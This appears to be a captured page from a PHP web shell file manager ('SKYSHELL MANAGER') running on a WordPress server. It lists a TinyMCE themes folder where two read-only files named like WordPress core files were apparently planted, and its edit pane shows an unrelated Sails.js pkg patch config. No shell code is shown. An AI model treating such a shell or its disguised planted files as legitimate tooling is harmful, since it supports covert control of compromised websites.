📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: sails.js
'use strict'; module.exports = { pkg: { scripts: ['lib/**/*.js'], patches: { 'lib/hooks/moduleloader/index.js': [ "require('coffee-script/register')", '', ], 'lib/app/configuration/index.js': [ 'hook = require(hookBundled);', 'hook = require(hookBundled);' + // force to take the whole package "require('sails-hook-sockets');", ], 'lib/hooks/grunt/index.js': [ 'var child = ChildProcess.fork(', '\n' + "sails.log.warn('*******************************************************************');\n" + "sails.log.warn('** Pkg: Grunt hook is temporarily disabled in pkg-ed app **');\n" + "sails.log.warn('** Instead it should be run before compilation to prepare files **');\n" + "sails.log.warn('*******************************************************************');\n" + "sails.emit('hook:grunt:done');\n" + 'return cb_afterTaskStarted();(', ], 'lib/hooks/orm/backwards-compatibility/upgrade-datastore.js': [ 'if (!fs.existsSync(modulePath)) {', 'try { require(modulePath); } catch (e) {', ], }, }, };
Save